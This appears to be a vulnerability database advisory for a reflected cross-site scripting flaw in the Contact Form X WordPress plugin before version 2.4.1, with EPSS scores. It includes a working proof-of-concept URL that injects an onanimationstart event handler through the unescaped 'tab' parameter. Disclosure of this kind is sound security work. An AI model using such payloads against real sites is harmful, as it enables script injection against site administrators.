Lucene search

K
wpexploitWpvulndbWPEX-ID:C8D2DF75-D862-48E3-A747-680D7AFC53E7
HistoryFeb 25, 2022 - 12:00 a.m.

Contact Form X < 2.4.1 - Reflected Cross-Site Scripting

2022-02-2500:00:00
wpvulndb
141

0.002 Low

EPSS

Percentile

52.6%

The plugin does not escape the tab parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

https://example.com/wp-admin/options-general.php?page=contactformx&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//

0.002 Low

EPSS

Percentile

52.6%

Related for WPEX-ID:C8D2DF75-D862-48E3-A747-680D7AFC53E7